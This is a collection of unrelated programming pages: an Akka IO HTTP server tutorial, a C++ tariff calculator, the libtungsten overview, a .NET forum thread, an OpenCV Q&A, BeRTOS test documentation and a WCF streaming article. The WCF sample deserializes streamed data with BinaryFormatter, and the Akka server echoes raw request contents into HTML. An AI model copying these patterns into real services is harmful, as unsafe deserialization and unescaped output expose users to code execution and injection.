We know that getObject() returns a generic value whose type is a subclass of Number. The compiler first traverses all visible methods of StringBuilder, including those inherited from its parent classes, to find out whether there is a method named append whose parameter type is exactly Number. If there is one, that method is used directly. If not, the compiler has to decide what the most suitable method is, and the key question is how "most suitable" is defined. For example, there is an append method whose parameter is of type Object, and Number is a subclass of Object, so that method is a candidate. If there were an append method whose parameter is of type Serializable (there is no such overload, but suppose there were), Number implements that interface, so that method would also be a candidate. Which is more suitable, the Object parameter or the Serializable parameter? What's more, StringBuilder has an append method whose parameter is CharSequence, and the type the compiler infers for our argument can be both a subclass of Number and an implementer of CharSequence. Should that one be chosen? All of these questions need answering, and each answer has its own reasons; each seems defensible.
Type derivation of generics in JDK6
The javac code of JDK6 is analyzed here, but the logic for this problem in JDK7 is almost the same, so take this as the example. Generic type derivation in JDK6 is actually relatively simple. From the output above, we can already guess that the append method with the Object parameter is considered the most appropriate:
private Symbol findMethod(Env<AttrContext> env,
                          Type site,
                          Name name,
                          List<Type> argtypes,
                          List<Type> typeargtypes,
                          Type intype,
                          boolean abstractok,
                          Symbol bestSoFar,
                          boolean allowBoxing,
                          boolean useVarargs,
                          boolean operator) {
    for (Type ct = intype; ct.tag == CLASS; ct = types.supertype(ct)) {
        ClassSymbol c = (ClassSymbol)ct.tsym;
        if ((c.flags() & (ABSTRACT | INTERFACE | ENUM)) == 0)
            abstractok = false;
        for (Scope.Entry e = c.members().lookup(name);
             e.scope != null;
             e = e.next()) {
            //- System.out.println(" e " + e.sym);
            if (e.sym.kind == MTH &&
                (e.sym.flags_field & SYNTHETIC) == 0) {
                bestSoFar = selectBest(env, site, argtypes, typeargtypes,
                                       e.sym, bestSoFar,
                                       allowBoxing, useVarargs, operator);
            }
        }
        //- System.out.println(" - " + bestSoFar);
        if (abstractok) {
            Symbol concrete = methodNotFound;
            if ((bestSoFar.flags() & ABSTRACT) == 0)
                concrete = bestSoFar;
            for (List<Type> l = types.interfaces(c.type);
                 l.nonEmpty();
                 l = l.tail) {
                bestSoFar = findMethod(env, site, name, argtypes, typeargtypes,
                                       l.head, abstractok, bestSoFar,
                                       allowBoxing, useVarargs, operator);
            }
            if (concrete != bestSoFar &&
                concrete.kind < ERR && bestSoFar.kind < ERR &&
                types.isSubSignature(concrete.type, bestSoFar.type))
                bestSoFar = concrete;
        }
    }
    return bestSoFar;
}
The logic above roughly traverses the current class (StringBuilder in this example) and its parent classes, and finds the most appropriate method among their members to return. The key part is the selectBest method:
Symbol selectBest(Env<AttrContext> env,
                  Type site,
                  List<Type> argtypes,
                  List<Type> typeargtypes,
                  Symbol sym,
                  Symbol bestSoFar,
                  boolean allowBoxing,
                  boolean useVarargs,
                  boolean operator) {
    if (sym.kind == ERR) return bestSoFar;
    if (!sym.isInheritedIn(site.tsym, types)) return bestSoFar;
    assert sym.kind < AMBIGUOUS;
    try {
        if (rawInstantiate(env, site, sym, argtypes, typeargtypes,
                           allowBoxing, useVarargs, Warner.noWarnings) == null) {
            // inapplicable
            switch (bestSoFar.kind) {
                case ABSENT_MTH: return wrongMethod.setWrongSym(sym);
                case WRONG_MTH: return wrongMethods;
                default: return bestSoFar;
            }
        }
    } catch (Infer.NoInstanceException ex) {
        switch (bestSoFar.kind) {
            case ABSENT_MTH: return wrongMethod.setWrongSym(sym, ex.getDiagnostic());
            case WRONG_MTH: return wrongMethods;
            default: return bestSoFar;
        }
    }
    if (!isAccessible(env, site, sym)) {
        return (bestSoFar.kind == ABSENT_MTH)
            ? new AccessError(env, site, sym)
            : bestSoFar;
    }
    return (bestSoFar.kind > AMBIGUOUS)
        ? sym
        : mostSpecific(sym, bestSoFar, env, site,
                       allowBoxing && operator, useVarargs);
}
The main logic of this method lies in the rawInstantiate method (its code is not pasted here; interested readers can look it up themselves. Its most critical call is the argumentsAcceptable method, pasted below, which is mainly used for parameter matching). If the current method is also applicable, it is compared with the best method selected so far to see which is more suitable. That selection happens in the mostSpecific method at the end; it is actually similar to a bubble sort, just finding the closest type (searching for the matching method up through the parent classes layer by layer, a bit like finding a least common multiple).
boolean argumentsAcceptable(List<Type> argtypes,
                            List<Type> formals,
                            boolean allowBoxing,
                            boolean useVarargs,
                            Warner warn) {
    Type varargsFormal = useVarargs ? formals.last() : null;
    while (argtypes.nonEmpty() && formals.head != varargsFormal) {
        boolean works = allowBoxing
            ? types.isConvertible(argtypes.head, formals.head, warn)
            : types.isSubtypeUnchecked(argtypes.head, formals.head, warn);
        if (!works) return false;
        argtypes = argtypes.tail;
        formals = formals.tail;
    }
    if (formals.head != varargsFormal) return false; // not enough args
    if (!useVarargs)
        return argtypes.isEmpty();
    Type elt = types.elemtype(varargsFormal);
    while (argtypes.nonEmpty()) {
        if (!types.isConvertible(argtypes.head, elt, warn)) return false;
        argtypes = argtypes.tail;
    }
    return true;
}
For our specific example, this checks which append method in StringBuilder has a parameter type that is a supertype of Number. If a parameter does not match, the method is not applicable; if all the parameters meet expectations, the method is applicable and is returned. So the logic in JDK6 is relatively simple.
Type derivation of generics in JDK8
The derivation in JDK8 is relatively complex, but most of the logic is similar to the above. However, argumentsAcceptable changes a lot: some data structures are added, the rules become more complex, and more scenarios are considered. Because the code nesting is very deep, I will not paste the specific code; interested readers can follow it themselves (the specific changes can be seen starting from the AbstractMethodCheck.argumentsAcceptable method).
For this demo, since the type inferred for the value returned by getObject can be both a subclass of Number and an implementation of CharSequence, JDK8 considers the append method with the CharSequence parameter more suitable than the one with the Object parameter. This seems stricter, narrowing the applicable scope rather than matching the broad Object overload. Therefore, an extra layer of checkcast is emitted, though I think it is a little too radical.
CC-MAIN-2021-39
refinedweb
1,564
57.37
Hi!

> "..metas" will collide less often. Apparently Meta is a finnish name or
> something, so Linus does not like it. The exact string is really not
> very important to me. I agree that "..." is elegant.

Well, "..." is mostly used by script kiddies -- they usually have their rootkit collection there :-).

It would be nice to decide on one escape into the "meta" namespace; uservfs and similar projects probably should be converted to use the same escape.

[Uservfs currently uses things like cat /tmp/foo.tgz#utar/bar.gz#ugz ... essentially using # as another separator. It should probably be converted to use the same meta escape.]

Pavel
-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.kernel.org
More majordomo info at
read the FAQ at
http://lkml.org/lkml/2004/9/7/291
CC-MAIN-2015-06
refinedweb
127
61.02
Whenever I'm developing an application, I always find it easier to use a control or library that someone else has already written rather than to try to do it myself. That's why I, and no doubt many of you, come to the Code Project - because it's a fantastic resource for ready-made components. However, when you get here, you have to trawl through to find what you're looking for, download the source and the demo project, build them to make sure they work, then copy them somewhere useful, then add them to your project, and then you can start to use them.
This is where Code Store comes in. Code Store is an add-in providing you with instant integrated access to an online repository of .NET components. All of the components are already built and ready to use; all Code Store does is download the ones you ask for and then automatically adds them to the toolbox ready for you to use in your project.
Having rethought my earlier statement (below) and my current circumstances, I have decided that I do not have the financial resources to be able to support such a venture. I am therefore offering CodeStore to CodeProject as a free and exclusive service to all CodeProject members. I am currently waiting to hear from Chris Maunder, which has caused delays to the development.
Development has now restarted as I am keen to be able to provide something to the #Develop team as soon as possible. The web site design has been revamped, courtesy of Movable Type (back-end) and Paul Watson (new layout). The RSS feed has changed to this.
I am currently considering the possibility of leaving my job and concentrating on the development of Code Store. I believe that it has real potential, especially once we have reached the stage where UI and non-UI components are supported as well as ASP.NET Web Controls. In order to make this happen, I would need to make some kind of charge.
I don't think selling the software itself is the way to go; I think that having a subscription-based service that allows users to download components is a better approach. I am currently thinking of somewhere in the region of £10 per year as the subscription fee at the entry level to allow access to free components (like those available here at the Code Project). Later, higher level subscriptions could be introduced that provide access to professional components like those produced by Dundas. In order to protect Code Store, updates to the source code will no longer be made available for download. The source for version 2.0 is (and will remain) available for download. Updates and new releases to the software will continue to be made available here.

To get started, just download one of the setup projects (see links at the top of the article), and install Code Store. Once installed, go to the Tools menu and choose "Code Store". This will download an XML file that lists the available components, which is then parsed to display a list to you. Select the components you want and click on download. After each component has completed, it is added to a tab called "Code Store" in the toolbox.

As with most of my work of this sort of scale, I started off with some design. I always start off with a Use Case diagram as I find it a good, clear way of representing the requirements from a user's point of view, and I can always keep referring back to it to check I'm still going the right way.

Figure 1 - Use Case Diagram Showing Add-in Use

Having developed Code Store to its initial release and on to version 1.2 in order to meet the competition deadline, it was then time to learn from what I had done and designed, then re-write it all. This gave rise to version 2.0, which is separated into three areas: interaction with Visual Studio, file downloads and the user interface.
This structure is illustrated in the following package diagram:

Figure 2 - Package Diagram Showing Overall Structure

The following set of diagrams present each of the packages in the add-in:

Figure 3 - Class Diagram for the Salamander.Addins.CodeStore Namespace
Figure 4 - Class Diagram for the Salamander.Addins.CodeStore.Engine Namespace
Figure 5 - Class Diagram for the Salamander.Addins.CodeStore.UserInterface Namespace

The add-in contains a single command that when executed first downloads the component list XML file from the server. This XML file is parsed and then the details are added to a ListView control and displayed to the user with checkboxes. The user ticks the checkbox for each component they want to download and then, in turn, each component is downloaded. The progress event is used to display current download progress. The download complete event is then used to add the control to the Code Store tab on the toolbox (see Points of Interest below).

There are essentially two parts to the add-in: the first is the interaction with Visual Studio and the second performs the file downloads. The add-in is set up and configured during the OnConnection event. The command is only added to the menu during UI setup (connectMode == Extensibility.ext_ConnectMode.ext_cm_UISetup), which occurs the first time the add-in is loaded after installation, to enable users to customize their user interface without having it reset each time the add-in loads. This UI setup phase is determined based on a value for each add-in in the HKCU\Software\Microsoft\VisualStudio\7.1\PreloadAddinState\ key. If the value (e.g. Salamander.Addins.CodeStore.Connect) is '1', then the user interface has yet to be initialized; if it is '0', then user interface initialization has already occurred.
Having added the command to the Tools menu, the add-in then looks to see if the Code Store tab already exists in the toolbox; if it doesn't, then one is created. All user interface components downloaded by Code Store are added to the Code Store tab on the toolbox. This occurs even if no solution is loaded.

ToolBoxTab toolBoxTab = null;
try
{
    Window win = applicationObject.Windows.Item(EnvDTE.Constants.vsWindowKindToolbox);
    ToolBox toolBox = (ToolBox)win.Object;
    ToolBoxTabs toolBoxTabs = toolBox.ToolBoxTabs;
    // Look to see if it's already been added.
    for (int i = 1; i < toolBoxTabs.Count; i++)
    {
        if ("Code Store" == toolBoxTabs.Item(i).Name)
        {
            toolBoxTab = toolBoxTabs.Item(i);
            break;
        }
    }
    if (null == toolBoxTab)
    {
        toolBoxTab = toolBoxTabs.Add("Code Store");
    }

The remaining interaction with Visual Studio comes once a component has been downloaded. Once the file has been downloaded, that component is added to the Code Store tab on the toolbox. This is done as follows:

this.toolBoxTab.ToolBoxItems.Add(comp.Name, strPath,
    EnvDTE.vsToolBoxItemFormat.vsToolBoxItemFormatDotNETComponent);

Here, comp.Name is the component's Name and strPath is its FileName. For a non-user interface component (supported since version 2.1), an assembly reference is added to the first project in the solution, if one is currently loaded.

The process involved in downloading the files is very simple, performing each download one after the other in a separate thread to keep the user interface responsive. The download classes were originally Ray Hayes' WebDownload class. Though these have been re-written from scratch, they are still fairly similar. Ray's article describes the download process and so I have not reproduced it here.
The class diagram for the Salamander.Net namespace containing the WebDownload class is as follows:

Figure 6 - Class Diagram for the Salamander.Net Namespace

A very simple XML file is used to transfer the component information. It is simply stored on the Code Store web server and downloaded by the add-in each time the components list is displayed. My original hope was that MySQL (the current database of components) would be able to export the table contents in well-formed XML. Unfortunately, it incorrectly closes each tag (it does not include the '/') and there is no container for each row, so some manual editing is required first. My hope is that in time the back-end could be ported over as some kind of web service running off SQL Server, so hopefully those XML export issues will go away.

The file itself simply contains a "codestore" element, which then contains a "component" element for each of the components. The component element consists of the following items: ID, Version, Description, Author, DateSubmitted and MoreInfo. A sample of the XML file is as follows:

<?xml version="1.0"?>
<codestore>
  <component>
    <ID>1</ID>
    <Name>Browse For Folder</Name>
    <FileName>Salamander.Windows.Forms.BrowseForFolder.dll</FileName>
    <Version>1.0.1221.24682</Version>
    <Description>Managed wrapper around the BrowseForFolder function.</Description>
    <Author>Derek Lakin</Author>
    <DateSubmitted>2003-06-24 10:28:50</DateSubmitted>
    <MoreInfo>NULL</MoreInfo>
  </component>
  <component>
    <ID>2</ID>
    <Name>Collapsible Panel Bar</Name>
    <FileName>CollapsiblePanelBar.dll</FileName>
    <Version>1.4.1059.25679</Version>
    <Description>Panel and panel bar class that imitate Windows XP collapsible panels.</Description>
    <Author>Derek Lakin</Author>
    <DateSubmitted>2003-06-24 10:28:50</DateSubmitted>
    <MoreInfo> products/collapsiblepanelbar.htm</MoreInfo>
  </component>
</codestore>

Since version 1.2, proxy server support has been added (due to the help and support of
Alex Kucherenko). Since version 2.0, the proxy server settings have been editable from the 'Options' section. The proxy settings are applied in the ApplyOptions method of the Engine class:

/// <SUMMARY>
/// Apply the current add-in options.
/// </SUMMARY>
internal void ApplyOptions()
{
    WebProxy proxy = GlobalProxySelection.GetEmptyWebProxy() as WebProxy;
    try
    {
        proxy = WebProxy.GetDefaultProxy();
    }
    // only IE 5.5 and higher
    catch (System.Exception exc)
    {
        System.Diagnostics.Trace.WriteLine(exc.Message, "Engine.ApplyOptions");
    }
    try
    {
        if (true == this.options.UseProxy)
        {
            proxy = new WebProxy(this.options.ProxyAddress + ":" + this.options.ProxyPort,
                this.options.BypassProxyOnLocal);
            if (true == this.options.ProxyAuthorisation)
            {
                if (this.options.ProxyUser != null && this.options.ProxyUser.Length > 0)
                    proxy.Credentials = new NetworkCredential(
                        this.options.ProxyUser, this.options.ProxyPassword);
            }
            else
            {
                proxy.Credentials = System.Net.CredentialCache.DefaultCredentials;
            }
        }
    }
    finally
    {
        this.webProxy = proxy;
    }
    this.formCodeStore.userControlOptions.ApplyOptions(ref this.options);
}

In addition to the add-in itself, there is a web site that also allows you to browse the available components and allows component developers to add information about their components into the database. For several reasons, there is no live component upload feature. The major reason is time and my inability to get it to work :/. But another reason is security. I want to be able to check components before they are made available, to stop malicious code getting into other people's systems. The web site hosts a MySQL database, which is used to display the component list on the site and also to generate the XML file that is downloaded by the add-in. But, mainly the purpose of the site is to host the actual components themselves.

Version 1.2 is available for .NET 1.1 and 1.0, but the new version 2.0 (and later) is currently only available for .NET 1.1.
If anyone can provide some useful insight into converting from VS.NET 7.1 to 7.0, especially with regard to Deployment Projects and resx files, I would like to hear from you.

Currently, only independent UI and non-UI components are supported, i.e. components that are not dependent on additional libraries (other than the standard .NET Framework libraries). In time, support for compressed archives and dependent files, as well as support for ASP.NET Web Controls, will be added. Other forthcoming features are detailed in the "Future Features" section below.

There are two bugs that I am aware of that relate specifically to this add-in and they are both to do with adding things to the toolbox. The first requires the Property Window to be opened before you can successfully add a control to the toolbox, and the second requires the tab to have focus. Despite numerous rumors and attempts in different threads in different newsgroups, the most reliable solution to these bugs is as follows. Firstly, you need to call:

applicationObject.ExecuteCommand("View.PropertiesWindow");

Then, before you call ToolBoxItems.Add(), you need to call:

myTab.Activate();

This add-in has the potential to be enormously useful and to save time for developers like you and me. However, it is nothing if there are only a few components to download. So, if you are a .NET developer and you have a UI control, a library of them or some other code library, then go here and register the details, then send me the release build DLL to codestore@salamandersoftware.biz. If anyone feels that they have something they could add to the Code Store development or can provide the implementation for any of the "future features" below, then you can register and join in at the GotDotNet Code Store Workspace.

Many thanks to Paul Watson and Alex Kucherenko for their testing effort prior to release, as well as Matt Dixon and Marc Merritt for their assistance with the post-release bugs in version 2.0.
Thanks also to Furty for his Collapsible Splitter control. Many thanks to all those authors who have contributed their work to the initial repository of components.

The current development plan is detailed below. The timescales are estimates and could easily slide if Real Life™ gets in the way. The plan includes features that have definitely made the cut; additional features may also be added, especially if enough people ask for it.

- Initial release of basic functionality.
- Proxy server support plus minor bug fixes.
- Rework internal architecture to separate functionality.
- New user interface - edit options without editing registry (completed early: 22/07/2003).
- Add automatic update notification (pull not push) - based on update interval in options.

This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)

Derek Lakin
http://www.codeproject.com/Articles/4400/Code-Store-A-VS-NET-Add-in
Functional programming means handling a large chunk of code by defining your own functions: you decompose a problem into a set of small, reusable functions. In this article, I'll walk you through what functional programming in Python is.

What is Functional Programming?

Functional programming means producing outputs by taking only inputs and not touching any internal state that may affect the output for a particular input.

It is a method of managing your large code in small tasks that can be used from multiple places within an application. For example, if something you want to implement in your app requires a dozen lines of code, you don't want to repeat the same code every time you need it. Also, whenever you want to change anything or fix a mistake in some code, you don't have to do it in every place you wrote the code. If the code is inside a function, you only have to change or correct it in one location.

Functional Programming in Python

Here are the 4 techniques we use for functional programming in Python:

- Lambda Function
- Map Function
- Reduce Function
- Filter Function

Now let's go through all these techniques one by one.

Lambda Function: An anonymous function is defined using lambda. The lambda's parameters are defined to the left of the colon. The body of the function is defined to the right of the colon. Let's see how to use the lambda function in Python:

s = lambda x: x * x
s(2)
4

Map Function: The map function takes a function and a collection of items. It creates a new, empty collection, runs the function on each item in the original collection, inserts each returned value into the new collection, and returns the new collection as the output.
Let's see how to use the map function in Python:

def addition(n):
    return n + n

numbers = (1, 2, 3, 4)
result = map(addition, numbers)
print(list(result))

[2, 4, 6, 8]

Reduce Function: Just like the map function, the reduce function also takes a function and a collection of items, and then returns the value created by combining the items. Let's see how to use the reduce function in Python:

import functools

def mult(x, y):
    print("x=", x, " y=", y)
    return x * y

fact = functools.reduce(mult, range(1, 10))
print(fact)

x= 1  y= 2
x= 2  y= 3
x= 6  y= 4
x= 24  y= 5
x= 120  y= 6
x= 720  y= 7
x= 5040  y= 8
x= 40320  y= 9
362880

Filter Function: Just like the map and reduce functions, the filter function also takes a function and a collection of elements, and then returns a collection of the elements for which the function returned True. Let's see how to use the filter function in Python:

seq = [0, 1, 2, 3, 5, 8, 13]
result = filter(lambda x: x % 2 != 0, seq)
print(list(result))

[1, 3, 5, 13]

Summary

So we use the lambda, map, reduce, and filter functions in Python for functional programming. You should try to use these functions in your projects to master them properly. I hope you liked this article on what functional programming in Python is. Feel free to ask your valuable questions in the comments section below.
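The four techniques above compose naturally, because map and filter return lazy iterators that can be fed straight into reduce. As a hedged sketch (the order amounts and the discount rule are invented for illustration), here is a small pipeline chaining all of them with lambdas:

```python
import functools

# Hypothetical data: a list of order amounts (made up for illustration).
orders = [120, 45, 300, 80, 15]

# map: apply a 10% discount to every order.
discounted = map(lambda amount: amount * 0.9, orders)

# filter: keep only the discounted orders worth at least 50.
large = filter(lambda amount: amount >= 50, discounted)

# reduce: combine the remaining amounts into a single total.
total = functools.reduce(lambda x, y: x + y, large)

print(total)  # 450.0
```

Because map and filter return one-shot iterators, the pipeline can only be consumed once; convert the intermediate results to a list first if you need to reuse them.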
https://thecleverprogrammer.com/2021/01/31/functional-programming-in-python/
Deploying OpenStack on AWS

It might sound like Cloudception, but you can deploy OpenStack over AWS, assuming you handle the various networking problems that will pop up.

OpenStack can be installed on a virtual machine. However, unlike a usual nested hypervisor setup, installing OpenStack on AWS EC2 instances has a few restrictions on the networking part for the OpenStack setup to work properly. This blog outlines the limitations and their solutions to run OpenStack on top of an AWS EC2 VM.

Limitations

The AWS environment will allow packets to flow in its network only when the MAC address is known/registered in the AWS network environment. Also, the MAC address and the IP address are tightly mapped, so the AWS environment will not allow packet flow if the MAC address registered for the given IP address is different. You may wonder whether the above restrictions will impact the OpenStack setup on AWS EC2. Yes! Yes, it will! While configuring the Neutron networking, we would be creating a virtual bridge (say, br-ex) for the provider network, where all the VMs' traffic will reach the Internet via the external bridge, followed by the actual physical NIC (say, eth1). In that case, we usually configure the external interface (NIC) with a special type of configuration.

Due to this special type of interface configuration, the restriction in AWS will hit OpenStack's networking. In a mainstream OpenStack setup, the above-mentioned provider interface would be configured with a special NIC configuration that would have no IP for that interface and would allow all packets via that specially configured NIC.
Moreover, the VM packets reaching the Internet via this specially configured NIC would carry addresses that AWS does not recognize, so they are dropped. The router's namespace can be listed with "ip netns show" and entered with "ip netns exec qrouter-<router-id> ...".

One option would be to register the router's MAC address and its IP address with the AWS environment. However, this is not feasible. AWS currently does not have the features available to register any random MAC address and IP address inside the VPC. Moreover, allowing this type of functionality would be a severe security threat to the environment.

Instead, assign the router's gateway an IP address that is already registered in AWS:

neutron router-gateway-set router provider --fixed-ip ip_address=<Registered_IP_address>

IP Address and MAC Address Mismatch

After configuring the router gateway with the AWS-registered IP address, each packet from the router's gateway will have the AWS-registered IP address as the source IP address, but along with the IP address we also need to change the MAC address of the router's interface. The below-mentioned steps will do that magic.

- Install macchanger.
- Note down the actual/original MAC address of the provider NIC (eth1).
- Change the MAC address of the provider NIC (eth1).
- Change the MAC address of the router's gateway interface to the original MAC address of eth1.

Now, try to ping 8.8.8.8 from the router namespace. If you get a successful ping response, then we are done with the Cloud on Cloud setup.

Key Points to Remember

Change the MAC address: In my case, I had to swap the MAC address of the NIC as described above.

Floating IP disabled: Associating a floating IP to any OpenStack VM will send the packet via the router's gateway with the source IP address as a floating IP address. This will make the packets hit the AWS switch with non-registered IP and MAC addresses, which results in dropping the packets. So, we could not use the floating IP functionality in this setup. However, we could still access the VM publicly using the below-mentioned NAT process.

NAT to access OpenStack VM: As I mentioned above, we could access the OpenStack VM publicly using the registered IP address that we have assigned for our router's gateway.
Use the following NAT command to access the OpenStack VM using the AWS EC2 instance's elastic IP:

$ ip netns exec qrouter-f85bxxxx-61b2-xxxx-xxxx-xxxxba0xxxx iptables -t nat -A PREROUTING -p tcp -d 172.16.20.101 --dport 522 -j DNAT --to-destination 192.168.20.5:22

Note: The above command adds a NAT rule forwarding all packets for 172.16.20.101 on port 522. With this rule, all the packets reaching 172.16.20.101 on port 522 will be forwarded to 192.168.20.5:22. Here, 172.16.20.101 is the registered IP address of the AWS EC2 instance, which was assigned for the router's gateway, and 192.168.20.5 is the local IP of the OpenStack VM. Notably, 172.16.20.101 already has a NAT with the AWS elastic IP, which means all the traffic that comes to the elastic IP (public IP) will be forwarded to this VPC local IP (172.16.20.101). In short: [Elastic IP]:522 > 172.16.20.101:522 > 192.168.20.5:22. This means you could SSH into the OpenStack VM globally by using the elastic IP address and the respective port number.

Elastic IP address: For this type of customized OpenStack installation, we required at least two NICs for the AWS EC2 instance. You need one for accessing the VM terminal for the installation and for accessing the dashboard; in short, it acts as a management network/VM tunnel network/API network. The second one is for the external network, with the unique interface configuration described above, mapped to the provider network bridge (br-ex with eth1). AWS will not allow any packets to travel out of the VPC unless an elastic IP is attached to that IP address. To overcome this problem, we must attach the elastic IP for this NIC. The packets of OpenStack's VMs will reach the OpenStack router's gateway and, from the gateway, the packets get embedded with the registered MAC address. Hence, the matching IP address will reach the AWS switch (VPC environment) via br-ex and eth1 (our special interface configuration) and then hit the AWS VPC gateway.
From there, the packets will reach the Internet.

Other Cloud Platforms

In my analysis, I could see most cloud providers like Dreamhost or Auro-cloud having the same limitations for OpenStack networking. So we could use the tricks/hacks mentioned above in any of those cloud providers to run an OpenStack cloud on top of it.

Note: Since we are using a QEMU emulator without KVM for the nested hypervisor environment, the VM performance will be slow.
https://dzone.com/articles/deploying-openstack-on-aws
IO (Scala)

Introduction

This documentation is in progress and some sections may be incomplete. More will be coming.

Components

ByteString

A primary goal of Akka's IO support is to only communicate between actors with immutable objects. When dealing with network IO on the JVM, Array[Byte] and ByteBuffer are commonly used to represent collections of Bytes, but they are mutable. Scala's collection library also lacks a suitably efficient immutable collection for Bytes. Being able to safely and efficiently move Bytes around is very important for this IO support, so ByteString was developed.

ByteString is a Rope-like data structure that is immutable and efficient. When two ByteStrings are concatenated, the result references both of them instead of copying the bytes into a new array. ByteString also comes with its own optimized builder and iterator classes, ByteStringBuilder and ByteIterator, which provide special features in addition to the standard builder / iterator methods:

Compatibility with java.io

A ByteStringBuilder can be wrapped in a java.io.OutputStream via the asOutputStream method. Likewise, a ByteIterator can be wrapped in a java.io.InputStream via asInputStream. Using these, akka.io applications can integrate legacy code based on java.io streams.

Encoding and decoding of binary data

ByteStringBuilder and ByteIterator support encoding and decoding of binary data. As an example, consider a stream of binary data frames with the following format:

frameLen: Int
n: Int
m: Int
n times {
  a: Short
  b: Long
}
data: m times Double

In this example, the data is to be stored in arrays of a, b and data.
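As a cross-check of the frame layout above, here is a hedged Python sketch using the standard struct module; the helper names encode_frame and decode_frame are invented for illustration and are not part of Akka. Big-endian byte order matches the BIG_ENDIAN setting used in the Scala examples, and decode_frame assumes the 4-byte frameLen prefix has already been consumed:

```python
import struct

def encode_frame(a, b, data):
    # Body layout (big-endian): n: Int, m: Int, n x (a: Short, b: Long), m x Double.
    out = struct.pack(">ii", len(a), len(data))
    for ai, bi in zip(a, b):
        out += struct.pack(">hq", ai, bi)
    out += struct.pack(">%dd" % len(data), *data)
    # Prefix the body with frameLen, as in the example format.
    return struct.pack(">i", len(out)) + out

def decode_frame(frame):
    # 'frame' is the body: frameLen has already been read and stripped.
    n, m = struct.unpack_from(">ii", frame, 0)
    offset = 8
    a, b = [], []
    for _ in range(n):
        ai, bi = struct.unpack_from(">hq", frame, offset)
        a.append(ai)
        b.append(bi)
        offset += 10  # 2 bytes for the Short + 8 bytes for the Long
    data = list(struct.unpack_from(">%dd" % m, frame, offset))
    return a, b, data

# Round trip: strip the 4-byte frameLen, then decode the body.
raw = encode_frame([1, 2], [10, 20], [0.5, 1.5, 2.5])
print(decode_frame(raw[4:]))  # ([1, 2], [10, 20], [0.5, 1.5, 2.5])
```

The 10-byte stride per (a, b) pair mirrors the Short plus Long layout in the format description above.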
Decoding of such frames can be efficiently implemented in the following fashion:

implicit val byteOrder = java.nio.ByteOrder.BIG_ENDIAN

val FrameDecoder = for {
  frameLenBytes ← IO.take(4)
  frameLen = frameLenBytes.iterator.getInt
  frame ← IO.take(frameLen)
} yield {
  val in = frame.iterator
  val n = in.getInt
  val m = in.getInt
  val a = Array.newBuilder[Short]
  val b = Array.newBuilder[Long]
  for (i ← 1 to n) {
    a += in.getShort
    b += in.getLong
  }
  val data = Array.ofDim[Double](m)
  in.getDoubles(data)
  (a.result, b.result, data)
}

This implementation naturally follows the example data format. In a true Scala application, one might, of course, want to use specialized immutable Short/Long/Double containers instead of mutable Arrays.

After extracting data from a ByteIterator, the remaining content can also be turned back into a ByteString using the toSeq method:

val n = in.getInt
val m = in.getInt
// ... in.get...
val rest: ByteString = in.toSeq

with no copying from bytes to rest involved. In general, conversions from ByteString to ByteIterator and vice versa are O(1) for non-chunked ByteStrings and (at worst) O(nChunks) for chunked ByteStrings.

Encoding of data also is very natural, using ByteStringBuilder:

implicit val byteOrder = java.nio.ByteOrder.BIG_ENDIAN

val a: Array[Short]
val b: Array[Long]
val data: Array[Double]

val frameBuilder = ByteString.newBuilder
val n = a.length
val m = data.length
frameBuilder.putInt(n)
frameBuilder.putInt(m)
for (i ← 0 to n - 1) {
  frameBuilder.putShort(a(i))
  frameBuilder.putLong(b(i))
}
frameBuilder.putDoubles(data)
val frame = frameBuilder.result()

The encoded data then can be sent over a socket (see IOManager):

val socket: IO.SocketHandle
socket.write(ByteString.newBuilder.putInt(frame.length).result)
socket.write(frame)

IO.Handle

IO.Handle is an immutable reference to a Java NIO Channel. Passing mutable Channels between Actors could lead to unsafe behavior, so instead subclasses of the IO.Handle trait are used.
Currently there are 2 concrete subclasses: IO.SocketHandle (representing a SocketChannel) and IO.ServerHandle (representing a ServerSocketChannel).

IOManager

The IOManager takes care of the low level IO details. Each ActorSystem has its own IOManager, which can be accessed by calling IOManager(system: ActorSystem). Actors communicate with the IOManager with specific messages. The messages sent from an Actor to the IOManager are handled automatically when using certain methods, and the messages sent from an IOManager are handled within an Actor's receive method.

Connecting to a remote host:

val address = new InetSocketAddress("remotehost", 80)
val socket = IOManager(actorSystem).connect(address)

val socket = IOManager(actorSystem).connect("remotehost", 80)

Creating a server:

val address = new InetSocketAddress("localhost", 80)
val serverSocket = IOManager(actorSystem).listen(address)

val serverSocket = IOManager(actorSystem).listen("localhost", 80)

Receiving messages from the IOManager:

def receive = {
  case IO.Listening(server, address) =>
    println("The server is listening on socket " + address)
  case IO.Connected(socket, address) =>
    println("Successfully connected to " + address)
  case IO.NewClient(server) =>
    println("New incoming connection on server")
    val socket = server.accept()
    println("Writing to new client socket")
    socket.write(bytes)
    println("Closing socket")
    socket.close()
  case IO.Read(socket, bytes) =>
    println("Received incoming data from socket")
  case IO.Closed(socket: IO.SocketHandle, cause) =>
    println("Socket has closed, cause: " + cause)
  case IO.Closed(server: IO.ServerHandle, cause) =>
    println("Server socket has closed, cause: " + cause)
}

IO.Iteratee

Included with Akka's IO support is a basic implementation of Iteratees. Iteratees are an effective way of handling a stream of data without needing to wait for all the data to arrive.
This is especially useful when dealing with non-blocking IO, since we will usually receive data in chunks which may not include enough information to process, or may contain much more data than we currently need.

This Iteratee implementation is much more basic than what is usually found. There is only support for ByteString input, and enumerators aren't used. The reason for this limited implementation is to reduce the amount of explicit type signatures needed and to keep things simple. It is important to note that Akka's Iteratees are completely optional; incoming data can be handled in any way, including other Iteratee libraries.

Iteratees work by processing the data they are given and returning either the result (with any unused input) or a continuation if more input is needed. They are monadic, so methods like flatMap can be used to pass the result of one Iteratee to another.

The basic Iteratees included in the IO support can all be found in the ScalaDoc under akka.actor.IO, and some of them are covered in the example below.

Examples

Http Server

This example will create a simple high performance HTTP server. We begin with our imports:

import akka.actor._
import akka.util.{ ByteString, ByteStringBuilder }
import java.net.InetSocketAddress

Some commonly used constants:

object HttpConstants {
  val SP = ByteString(" ")
  val HT = ByteString("\t")
  val CRLF = ByteString("\r\n")
  val COLON = ByteString(":")
  val PERCENT = ByteString("%")
  val PATH = ByteString("/")
  val QUERY = ByteString("?")
}

And case classes to hold the resulting request:

case class Request(meth: String, path: List[String], query: Option[String],
                   httpver: String, headers: List[Header], body: Option[ByteString])
case class Header(name: String, value: String)

Now for our first Iteratee. There are 3 main sections of a HTTP request: the request line, the headers, and an optional body.
The main request Iteratee handles each section separately:

object HttpIteratees {
  import HttpConstants._

  def readRequest =
    for {
      requestLine ← readRequestLine
